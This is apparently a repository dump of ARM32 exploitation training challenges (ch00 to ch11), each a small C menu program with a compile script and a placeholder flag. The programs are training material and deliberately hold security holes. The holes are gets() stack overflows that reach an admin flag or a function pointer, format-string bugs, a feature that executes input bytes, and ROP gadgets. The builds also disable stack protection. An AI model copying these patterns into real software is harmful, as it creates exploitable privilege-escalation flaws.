    printf("Enter message name:");
    // Bounded read: at most BUF_SIZE - 1 characters are stored.
    fgets(l.name, BUF_SIZE, stdin);
    printf("Enter message content:");
    // Intentional weakness (CWE-242 / CWE-121): gets() has no length limit, so
    // a line longer than content[] is written past the end of the array.
    // Outside a training binary this would be
    // fgets(l.content, sizeof l.content, stdin).
    gets(l.content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);
    // Since value is never assigned, this branch can only be taken after the
    // struct has been corrupted.
    if(l.value == 0x7){
        secret();
    }
}

// Prints the menu, reads one command line and dispatches it.
// Returns 0 when the user asked to exit, 1 otherwise.
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    // Bounded read; the trailing newline is kept, hence the "\n" in the
    // comparisons below.
    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

int main(int argc, char **argv){
    // Unbuffered stdout so prompts without a newline show up immediately.
    setbuf(stdout, NULL);
    // Set real, effective and saved UID to the current effective UID.
    // DockerFile.py on this page installs the binary with mode 4550 owned by
    // the "_root" account, so presumably that is the UID adopted here.
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch00!\n");
    // Keep showing the menu until menu() reports "exit".
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}
--------------------------------------------------------------------------------
/exercises-arm32v7/ch00/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch00.c -static -no-pie -o $1/ch00 2 | 
--------------------------------------------------------------------------------
/exercises-arm32v7/ch00/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag} 2 | 
--------------------------------------------------------------------------------
/exercises-arm32v7/ch01/ch01.c:
--------------------------------------------------------------------------------
//__author__ = '@tomereyz'
// ch01: menu-driven "message" program. The README on this page lists it as a
// "Stack Buffer Overflow" exercise, so the weakness in send() is intentional.
// NOTE(review): the header names are missing from the three #include lines as
// shown on this page (likely lost in extraction). The code calls printf/fgets,
// system and strcmp, so presumably stdio.h, stdlib.h and string.h - confirm
// against the repository.
#include
#include
#include

// Size of every input buffer in this program.
#define BUF_SIZE 50

// Prints the flag file through the shell. Its only call site is the admin
// check at the end of send().
void secret(){
    system("cat flag");
}

// Reads a message name and a message content from stdin and echoes them back.
void send(){
    // The fields live in one struct, so their order in memory is the
    // declaration order: name, then content, then admin.
    struct locals{
        char name[BUF_SIZE];
        char content[BUF_SIZE];
        char admin[BUF_SIZE];
    };
    // admin starts as "false" and no statement below assigns it.
    struct locals l = {.name = {0}, .content = {0}, .admin = "false"};

    printf("Creating message\n");
    printf("Enter message name:");
    // Bounded read: at most BUF_SIZE - 1 characters are stored.
    fgets(l.name, BUF_SIZE, stdin);
    printf("Enter message content:");
    // Intentional weakness (CWE-242 / CWE-121): gets() has no length limit, so
    // a line longer than content[] is written past the end of the array.
    // Outside a training binary this would be
    // fgets(l.content, sizeof l.content, stdin).
    gets(l.content);

    printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content);
    // An authorization decision that reads a flag stored next to an input
    // buffer: since admin is never assigned, the comparison can only succeed
    // after the struct has been corrupted.
    if(!(strcmp(l.admin, "true"))){
        secret();
    }
}

// Prints the menu, reads one command line and dispatches it.
// Returns 0 when the user asked to exit, 1 otherwise.
int menu(){
    char buffer[BUF_SIZE] = {0};

    printf("[*] menu\n");
    printf("menu - show this menu\n");
    printf("send - send new message\n");
    printf("exit - close program\n");

    // Bounded read; the trailing newline is kept, hence the "\n" in the
    // comparisons below.
    fgets(buffer, BUF_SIZE, stdin);

    if (strcmp(buffer, "menu\n") == 0){
        return 1;
    }
    else if (strcmp(buffer, "send\n") == 0){
        send();
        return 1;
    }
    else if (strcmp(buffer, "exit\n") == 0){
        return 0;
    }
    else{
        printf("Unknown command: %s", buffer);
        return 1;
    }

}

int main(int argc, char **argv){
    // Unbuffered stdout so prompts without a newline show up immediately.
    setbuf(stdout, NULL);
    // Set real, effective and saved UID to the current effective UID.
    // DockerFile.py on this page installs the binary with mode 4550 owned by
    // the "_root" account, so presumably that is the UID adopted here.
    uid_t uid = geteuid();
    setresuid(uid,uid,uid);
    printf("Welcome to ch01!\n");
    // Keep showing the menu until menu() reports "exit".
    while(1){
        if (!(menu())){
            break;
        }
        printf("\n");
    }
    printf("Exiting...\n");
}
--------------------------------------------------------------------------------
/exercises-arm32v7/ch01/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch01.c -static -no-pie -o $1/ch01 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch01/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch02/ch02.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | void secret(){ 9 | system("cat flag"); 10 | } 11 | 12 | void send(){ 13 | struct locals{ 14 | char name[BUF_SIZE]; 15 | char content[BUF_SIZE]; 16 | void (*hook)(); 17 | }; 18 | struct locals l = {.name = {0}, .content = {0}, .hook = 0}; 19 | 20 | printf("Creating message\n"); 21 | printf("Enter message name:"); 22 | fgets(l.name, BUF_SIZE, stdin); 23 | printf("Enter message content:"); 24 | gets(l.content); 25 | 26 | printf("name: \"%s\"\ncontent:\"%s\"\n", l.name, l.content); 27 | 28 | if(l.hook){ 29 | l.hook(); 30 | } 31 | } 32 | 33 | int menu(){ 34 | char buffer[BUF_SIZE] = {0}; 35 | 36 | printf("[*] menu\n"); 37 | printf("menu - show this menu\n"); 38 | printf("send - send new message\n"); 39 | printf("exit - close program\n"); 40 | 41 | fgets(buffer, BUF_SIZE, stdin); 42 | 43 | if (strcmp(buffer, "menu\n") == 0){ 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "send\n") == 0){ 47 | send(); 48 | return 1; 49 | } 50 | else if (strcmp(buffer, "exit\n") == 0){ 51 | return 0; 52 | } 53 | else{ 54 | printf("Unknown command: %s", buffer); 55 | return 1; 56 | } 57 | 58 | } 59 | 60 | int main(int argc, char **argv){ 61 | setbuf(stdout, NULL); 62 | uid_t uid = geteuid(); 63 | setresuid(uid,uid,uid); 64 | printf("Welcome to ch02!\n"); 65 | while(1){ 66 | if (!(menu())){ 67 | break; 68 | } 69 | 
printf("\n"); 70 | } 71 | printf("Exiting...\n"); 72 | } 73 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch02/compile.sh: -------------------------------------------------------------------------------- 1 | gcc $1/ch02.c -static -no-pie -o $1/ch02 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch02/flag: -------------------------------------------------------------------------------- 1 | zenysec{flag} 2 | -------------------------------------------------------------------------------- /exercises-arm32v7/ch03/ch03.c: -------------------------------------------------------------------------------- 1 | //__author__ = '@tomereyz' 2 | #include 3 | #include 4 | #include 5 | 6 | #define BUF_SIZE 50 7 | 8 | char command_string[BUF_SIZE] = "whoami\x00"; 9 | 10 | void secret02(){ 11 | strcpy(command_string, "cat flag\x00"); 12 | printf("secret02 called!\n"); 13 | } 14 | 15 | void secret01(){ 16 | system(command_string); 17 | printf("secret01 called!\n"); 18 | } 19 | 20 | void send(){ 21 | char name[BUF_SIZE] = {0}; 22 | char content[BUF_SIZE] = {0}; 23 | 24 | printf("Creating message\n"); 25 | printf("Enter message name:"); 26 | fgets(name, BUF_SIZE, stdin); 27 | printf("Enter message content:"); 28 | gets(content); 29 | 30 | printf("name: \"%s\"\ncontent:\"%s\"\n", name, content); 31 | } 32 | 33 | int menu(){ 34 | char buffer[BUF_SIZE] = {0}; 35 | 36 | printf("[*] menu\n"); 37 | printf("menu - show this menu\n"); 38 | printf("send - send new message\n"); 39 | printf("exit - close program\n"); 40 | 41 | fgets(buffer, BUF_SIZE, stdin); 42 | 43 | if (strcmp(buffer, "menu\n") == 0){ 44 | return 1; 45 | } 46 | else if (strcmp(buffer, "send\n") == 0){ 47 | send(); 48 | return 1; 49 | } 50 | else if (strcmp(buffer, "exit\n") == 0){ 51 | return 0; 52 | } 53 | else{ 54 | printf("Unknown command: %s", buffer); 55 | return 1; 56 | } 57 | 58 | } 59 | 60 | int main(int argc, 
char **argv){
61 |     setbuf(stdout, NULL);
62 |     uid_t uid = geteuid();
63 |     setresuid(uid,uid,uid); /* real, effective and saved UID all become the effective UID; result unchecked */
64 |     printf("Welcome to ch03!\n");
65 |     while(1){
66 |         if (!(menu())){
67 |             break;
68 |         }
69 |         printf("\n");
70 |     }
71 |     printf("Exiting...\n");
72 | }
73 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch03/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch03.c -static -fno-stack-protector -no-pie -o $1/ch03
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch03/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch04/ch04.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Two writable globals declared back to back: the message body and the string send() compares with "root". */
8 | char content[BUF_SIZE*2] = "dummy";
9 | char perm[BUF_SIZE*2] = "user";
10 | /* Prints the flag file by running "cat flag" through system(). */
11 | void secret(){
12 |     system("cat flag");
13 | }
14 | /* Reads a message name and body, echoes them, and calls secret() when perm equals "root".
      * NOTE(review): name[] holds BUF_SIZE bytes but fgets() is given BUF_SIZE*2 as its
      * limit, so the "bounded" read can still run past the array (sizeof name is the
      * correct limit). gets() into the global content[] has no limit at all (CWE-242).
      * Nothing in this file assigns perm after its initialiser, so the access decision
      * rests on memory that only an out-of-bounds write could change; keep such state
      * away from input buffers and bound every read.
      */
15 | void send(){
16 |     char name[BUF_SIZE] = {0};
17 |     printf("Creating message\n");
18 |     printf("Enter message name:");
19 |     fgets(name, BUF_SIZE*2, stdin); /* limit is twice the size of name[] */
20 |     printf("Enter message content:");
21 |     gets(content); /* unbounded read into a global buffer */
22 |
23 |     printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
24 |     if(strcmp(perm, "root") == 0){
25 |         secret();
26 |     }
27 | }
28 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
29 | int menu(){
30 |     char buffer[BUF_SIZE] = {0};
31 |
32 |     printf("[*] menu\n");
33 |     printf("menu - show this menu\n");
34 |     printf("send - send new message\n");
35 |     printf("exit - close program\n");
36 |
37 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
38 |
39 |     if (strcmp(buffer, "menu\n") == 0){
40 |         return 1;
41 |     }
42 |     else if (strcmp(buffer, "send\n") == 0){
43 |         send();
44 |         return 1;
45 |     }
46 |     else if (strcmp(buffer, "exit\n") == 0){
47 |         return 0;
48 |     }
49 |     else{
50 |         printf("Unknown command: %s", buffer);
51 |         return 1;
52 |     }
53 |
54 | }
55 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
56 | int main(int argc, char **argv){
57 |     setbuf(stdout, NULL);
58 |     uid_t uid = geteuid();
59 |     setresuid(uid,uid,uid); /* result unchecked */
60 |     printf("Welcome to ch04!\n");
61 |     while(1){
62 |         if (!(menu())){
63 |             break;
64 |         }
65 |         printf("\n");
66 |     }
67 |     printf("Exiting...\n");
68 | }
69 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch04/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch04.c -static -no-pie -o $1/ch04
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch04/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch05/ch05.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Prints the flag file by running "cat flag" through system(). No call to it appears in this file. */
8 | void secret(){
9 |     system("cat flag");
10 | }
11 | /* Reads a message name and body (both with fgets() limits that match the arrays) and echoes them.
      * NOTE(review): the body is passed to printf() as the format string itself, so any
      * conversion specifiers typed by the user are interpreted (CWE-134). The safe form
      * is printf("%s", content); -Wformat-security flags this pattern at build time.
      */
12 | void send(){
13 |     char name[BUF_SIZE*2] = {0};
14 |     char content[BUF_SIZE*2] = {0};
15 |
16 |     printf("Creating message\n");
17 |     printf("Enter message name:");
18 |     fgets(name, BUF_SIZE*2, stdin);
19 |     printf("Enter message content:");
20 |     fgets(content, BUF_SIZE*2, stdin);
21 |
22 |     printf("name: \"%s\"\ncontent:\"", name);
23 |     printf(content); /* user input used as the format string */
24 |     printf("\"\n");
25 | }
26 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
27 | int menu(){
28 |     char buffer[BUF_SIZE] = {0};
29 |
30 |     printf("[*] menu\n");
31 |     printf("menu - show this menu\n");
32 |     printf("send - send new message\n");
33 |     printf("exit - close program\n");
34 |
35 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
36 |
37 |     if (strcmp(buffer, "menu\n") == 0){
38 |         return 1;
39 |     }
40 |     else if (strcmp(buffer, "send\n") == 0){
41 |         send();
42 |         return 1;
43 |     }
44 |     else if (strcmp(buffer, "exit\n") ==
0){
45 |         return 0;
46 |     }
47 |     else{
48 |         printf("Unknown command: %s", buffer);
49 |         return 1;
50 |     }
51 |
52 | }
53 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, loops on menu(),
      * then leaves through exit(1), i.e. with a non-zero status even on the normal path. */
54 | int main(int argc, char **argv){
55 |     setbuf(stdout, NULL);
56 |     uid_t uid = geteuid();
57 |     setresuid(uid,uid,uid); /* result unchecked */
58 |     printf("Welcome to ch05!\n");
59 |     while(1){
60 |         if (!(menu())){
61 |             break;
62 |         }
63 |         printf("\n");
64 |     }
65 |     printf("Exiting...\n");
66 |     exit(1);
67 | }
68 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch05/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch05.c -static -no-pie -o $1/ch05
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch05/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch06/ch06.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #include
7 |
8 | #define BUF_SIZE 50
9 | #define PAGE_SIZE 4096
10 | /* Reads one line (at most PAGE_SIZE-1 bytes) from stdin, copies a full page into a
      * fresh anonymous mapping, switches that mapping from read/write to read/execute
      * and calls it as a function. Executing the bytes the user typed is what the
      * function is for (its prompt is "Enter byte to run:").
      * NOTE(review): content[] is not initialised, so memcpy() also copies whatever
      * stack bytes follow the input; the mmap() and mprotect() results are not checked
      * (mmap() reports failure as MAP_FAILED, not NULL). Outside a lab, input that is
      * executed needs sandboxing at the process level, not inside this function.
      */
11 | void runner(){
12 |     char content[PAGE_SIZE];
13 |     char *code;
14 |
15 |     printf("Enter byte to run:");
16 |     fgets(content, PAGE_SIZE, stdin);
17 |
18 |     code = mmap(NULL, PAGE_SIZE, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0);
19 |     memcpy(code, content, PAGE_SIZE); /* copies the whole array, not just the bytes read */
20 |
21 |     mprotect(code, PAGE_SIZE, PROT_READ|PROT_EXEC); /* the page is never writable and executable at once */
22 |
23 |     void (*func)() = (void (*)())code;
24 |     func();
25 |
26 |     munmap(code, PAGE_SIZE);
27 | }
28 | /* Reads a message name and body with bounded fgets() calls and echoes them with %s. */
29 | void send(){
30 |     char name[BUF_SIZE] = {0};
31 |     char content[BUF_SIZE] = {0};
32 |
33 |     printf("Creating message\n");
34 |     printf("Enter message name:");
35 |     fgets(name, BUF_SIZE, stdin);
36 |     printf("Enter message content:");
37 |     fgets(content, BUF_SIZE, stdin);
38 |
39 |     printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
40 | }
41 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n".
      * "runner\n" leads to runner(), which this file defines above. */
42 | int menu(){
43 |     char buffer[BUF_SIZE] = {0};
44 |
45 |     printf("[*] menu\n");
46 |     printf("menu - show this menu\n");
47 |     printf("send - send new message\n");
48 |     printf("runner - run bytes\n");
49 |     printf("exit - close program\n");
50 |
51 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
52 |
53 |     if (strcmp(buffer, "menu\n") == 0){
54 |         return 1;
55 |     }
56 |     else if (strcmp(buffer, "send\n") == 0){
57 |         send();
58 |         return 1;
59 |     }
60 |     else if (strcmp(buffer, "runner\n") == 0){
61 |         runner();
62 |         return 1;
63 |     }
64 |     else if (strcmp(buffer, "exit\n") == 0){
65 |         return 0;
66 |     }
67 |     else{
68 |         printf("Unknown command: %s", buffer);
69 |         return 1;
70 |     }
71 |
72 | }
73 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
74 | int main(int argc, char **argv){
75 |     setbuf(stdout, NULL);
76 |     uid_t uid = geteuid();
77 |     setresuid(uid,uid,uid); /* result unchecked */
78 |     printf("Welcome to ch06!\n");
79 |     while(1){
80 |         if (!(menu())){
81 |             break;
82 |         }
83 |         printf("\n");
84 |     }
85 |     printf("Exiting...\n");
86 | }
87 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch06/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch06.c -static -no-pie -o $1/ch06
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch06/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch07/ch07.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Global string holding "cat flag"; nothing in this file reads it. */
8 | char command_string[BUF_SIZE] = "cat flag\x00";
9 | /* Runs "whoami" through system(). No call to it appears in this file. */
10 | void func(){
11 |     system("whoami");
12 | }
13 | /* Holds one inline-asm instruction, pop {r0,pc}, which loads r0 and pc from the stack.
      * No call to it appears in this file. */
14 | void gadget(){
15 |     __asm__("pop {r0,pc}\n");
16 | }
17 | /* Reads a message name (bounded fgets()) and body (unbounded gets()) and echoes them;
      * see the gets() call further down in this function. */
18 | void send(){
19 |     char name[BUF_SIZE] = {0};
20 |     char content[BUF_SIZE] = {0};
21 |
22 |
printf("Creating message\n");
23 |     printf("Enter message name:");
24 |     fgets(name, BUF_SIZE, stdin);
25 |     printf("Enter message content:");
26 |     gets(content); /* NOTE(review): no length limit, so long input is written past content[] (CWE-242); use fgets(content, sizeof content, stdin) */
27 |
28 |     printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
29 | }
30 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
31 | int menu(){
32 |     char buffer[BUF_SIZE] = {0};
33 |
34 |     printf("[*] menu\n");
35 |     printf("menu - show this menu\n");
36 |     printf("send - send new message\n");
37 |     printf("exit - close program\n");
38 |
39 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
40 |
41 |     if (strcmp(buffer, "menu\n") == 0){
42 |         return 1;
43 |     }
44 |     else if (strcmp(buffer, "send\n") == 0){
45 |         send();
46 |         return 1;
47 |     }
48 |     else if (strcmp(buffer, "exit\n") == 0){
49 |         return 0;
50 |     }
51 |     else{
52 |         printf("Unknown command: %s", buffer);
53 |         return 1;
54 |     }
55 |
56 | }
57 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
58 | int main(int argc, char **argv){
59 |     setbuf(stdout, NULL);
60 |     uid_t uid = geteuid();
61 |     setresuid(uid,uid,uid); /* result unchecked */
62 |     printf("Welcome to ch07!\n");
63 |     while(1){
64 |         if (!(menu())){
65 |             break;
66 |         }
67 |         printf("\n");
68 |     }
69 |     printf("Exiting...\n");
70 | }
71 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch07/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch07.c -static -fno-stack-protector -no-pie -o $1/ch07
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch07/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch08/ch08.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Runs "whoami" through system(). No call to it appears in this file. */
8 | void func(){
9 |     system("whoami");
10 | }
11 | /* Reads a message name (bounded fgets()) and body (unbounded gets()) and echoes them;
      * see the gets() call further down in this function. */
12 | void send(){
13 |     char name[BUF_SIZE] = {0};
14 |     char content[BUF_SIZE] = {0};
15 |
16 |
printf("Creating message\n");
17 |     printf("Enter message name:");
18 |     fgets(name, BUF_SIZE, stdin);
19 |     printf("Enter message content:");
20 |     gets(content); /* NOTE(review): no length limit, so long input is written past content[] (CWE-242); use fgets(content, sizeof content, stdin) */
21 |
22 |     printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
23 | }
24 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
25 | int menu(){
26 |     char buffer[BUF_SIZE] = {0};
27 |
28 |     printf("[*] menu\n");
29 |     printf("menu - show this menu\n");
30 |     printf("send - send new message\n");
31 |     printf("exit - close program\n");
32 |
33 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
34 |
35 |     if (strcmp(buffer, "menu\n") == 0){
36 |         return 1;
37 |     }
38 |     else if (strcmp(buffer, "send\n") == 0){
39 |         send();
40 |         return 1;
41 |     }
42 |     else if (strcmp(buffer, "exit\n") == 0){
43 |         return 0;
44 |     }
45 |     else{
46 |         printf("Unknown command: %s", buffer);
47 |         return 1;
48 |     }
49 |
50 | }
51 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
52 | int main(int argc, char **argv){
53 |     setbuf(stdout, NULL);
54 |     uid_t uid = geteuid();
55 |     setresuid(uid,uid,uid); /* result unchecked */
56 |     printf("Welcome to ch08!\n");
57 |     while(1){
58 |         if (!(menu())){
59 |             break;
60 |         }
61 |         printf("\n");
62 |     }
63 |     printf("Exiting...\n");
64 | }
65 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch08/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch08.c -static -fno-stack-protector -no-pie -o $1/ch08
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch08/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch09/ch09.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* admin gates the privileged branch of authenticate(); nothing in this file assigns it after this initialiser. */
8 | int admin = 0;
9 | char command_string[BUF_SIZE] = "whoami\x00";
10 | /* Holds one inline-asm store, str r0, [r1] (writes r0 to the address in r1), then prints a marker.
      * No call to it appears in this file. */
11 | void write_anywhere(){
12 |     __asm__("str r0, [r1]");
13 |
printf("write_anywhere!\n");
14 | }
15 | /* Holds one inline-asm instruction, pop {r0,r1,pc}, which loads r0, r1 and pc from the stack.
      * No call to it appears in this file. */
16 | void gadget(){
17 |     __asm__("pop {r0,r1,pc}");
18 | }
19 | /* Sets command_string to "cat flag" and, only when the global admin equals 1, pins the
      * UIDs to the effective UID and runs the command through system().
      * NOTE(review): "You are not admin!" is printed on both paths, including after the
      * privileged branch ran; admin is a plain writable global that no code here sets,
      * so the check protects nothing once memory safety is lost elsewhere in the program.
      */
20 | void authenticate(){
21 |     uid_t uid = geteuid();
22 |     strcpy(command_string, "cat flag\x00");
23 |     if (admin == 1){
24 |         setresuid(uid,uid,uid); /* result unchecked */
25 |         system(command_string);
26 |     }
27 |     printf("You are not admin!\n");
28 | }
29 | /* Reads a message name (bounded fgets()) and body (unbounded gets()) and echoes them.
      * NOTE(review): gets() has no length limit, so long input is written past content[]
      * on the stack (CWE-242 / CWE-121); use fgets(content, sizeof content, stdin). This
      * challenge's compile.sh passes -fno-stack-protector, so no canary guards the frame.
      */
30 | void send(){
31 |     char name[BUF_SIZE] = {0};
32 |     char content[BUF_SIZE] = {0};
33 |
34 |     printf("Creating message\n");
35 |     printf("Enter message name:");
36 |     fgets(name, BUF_SIZE, stdin);
37 |     printf("Enter message content:");
38 |     gets(content); /* unbounded read into a 50-byte stack buffer */
39 |
40 |     printf("name: \"%s\"\ncontent:\"%s\"\n", name, content);
41 | }
42 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n".
      * "admin\n" is accepted and calls authenticate() although the printed menu does not list it. */
43 | int menu(){
44 |     char buffer[BUF_SIZE] = {0};
45 |
46 |     printf("[*] menu\n");
47 |     printf("menu - show this menu\n");
48 |     printf("send - send new message\n");
49 |     printf("exit - close program\n");
50 |
51 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
52 |
53 |     if (strcmp(buffer, "menu\n") == 0){
54 |         return 1;
55 |     }
56 |     else if (strcmp(buffer, "send\n") == 0){
57 |         send();
58 |         return 1;
59 |     }
60 |     else if (strcmp(buffer, "admin\n") == 0){
61 |         authenticate();
62 |         return 1;
63 |     }
64 |     else if (strcmp(buffer, "exit\n") == 0){
65 |         return 0;
66 |     }
67 |     else{
68 |         printf("Unknown command: %s", buffer);
69 |         return 1;
70 |     }
71 |
72 | }
73 | /* Entry point: unbuffers stdout and loops on menu(). It does not call setresuid() itself;
      * only authenticate() does, and only on its admin branch. */
74 | int main(int argc, char **argv){
75 |     setbuf(stdout, NULL);
76 |     printf("Welcome to ch09!\n");
77 |     while(1){
78 |         if (!(menu())){
79 |             break;
80 |         }
81 |         printf("\n");
82 |     }
83 |     printf("Exiting...\n");
84 | }
85 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch09/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch09.c -static -fno-stack-protector -no-pie -o $1/ch09
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch09/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch10/ch10.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Reads a message name and body from stdin and echoes them.
      * NOTE(review): two separate defects. The name is passed to printf() as the format
      * string, so conversion specifiers typed by the user are interpreted (CWE-134);
      * the safe form is printf("%s", name). The body is read with gets(), which has no
      * length limit (CWE-242); use fgets(content, sizeof content, stdin). The compile.sh
      * below builds with -fno-stack-protector and -z execstack, i.e. without a stack
      * canary and with an executable stack, so neither mitigation limits the impact.
      */
8 | void send(){
9 |     char name[BUF_SIZE] = {0};
10 |     char content[BUF_SIZE] = {0};
11 |
12 |     printf("Creating message\n");
13 |     printf("Enter message name:");
14 |     fgets(name, BUF_SIZE, stdin);
15 |     printf("Enter message content:");
16 |     gets(content); /* unbounded read into a 50-byte stack buffer */
17 |
18 |     printf("name: \"");
19 |     printf(name); /* user input used as the format string */
20 |     printf("\"\ncontent:\"%s\"\n", content);
21 | }
22 | /* Prints the command list, reads one line and dispatches on it; returns 0 only for "exit\n". */
23 | int menu(){
24 |     char buffer[BUF_SIZE] = {0};
25 |
26 |     printf("[*] menu\n");
27 |     printf("menu - show this menu\n");
28 |     printf("send - send new message\n");
29 |     printf("exit - close program\n");
30 |
31 |     fgets(buffer, BUF_SIZE, stdin); /* result unchecked; at EOF buffer stays empty */
32 |
33 |     if (strcmp(buffer, "menu\n") == 0){
34 |         return 1;
35 |     }
36 |     else if (strcmp(buffer, "send\n") == 0){
37 |         send();
38 |         return 1;
39 |     }
40 |     else if (strcmp(buffer, "exit\n") == 0){
41 |         return 0;
42 |     }
43 |     else{
44 |         printf("Unknown command: %s", buffer);
45 |         return 1;
46 |     }
47 |
48 | }
49 | /* Entry point: unbuffers stdout, pins all three UIDs to the effective UID, then loops on menu(). */
50 | int main(int argc, char **argv){
51 |     setbuf(stdout, NULL);
52 |     uid_t uid = geteuid();
53 |     setresuid(uid,uid,uid); /* result unchecked */
54 |     printf("Welcome to ch10!\n");
55 |     while(1){
56 |         if (!(menu())){
57 |             break;
58 |         }
59 |         printf("\n");
60 |     }
61 |     printf("Exiting...\n");
62 | }
63 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch10/compile.sh:
--------------------------------------------------------------------------------
1 | gcc $1/ch10.c -static -fno-stack-protector -z execstack -no-pie -o $1/ch10
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch10/flag:
--------------------------------------------------------------------------------
1 | zenysec{flag}
2 |
--------------------------------------------------------------------------------
/exercises-arm32v7/ch11/ch11.c:
--------------------------------------------------------------------------------
1 | //__author__ = '@tomereyz'
2 | #include
3 | #include
4 | #include
5 |
6 | #define BUF_SIZE 50
7 | /* Heap record for one message: two fixed-size character arrays. */
8 | typedef struct{
9 |     char name[BUF_SIZE];
10 |     char content[BUF_SIZE];
11 | } message;
12 | /* Heap record that ends in a function pointer, preceded by two unused character arrays. */
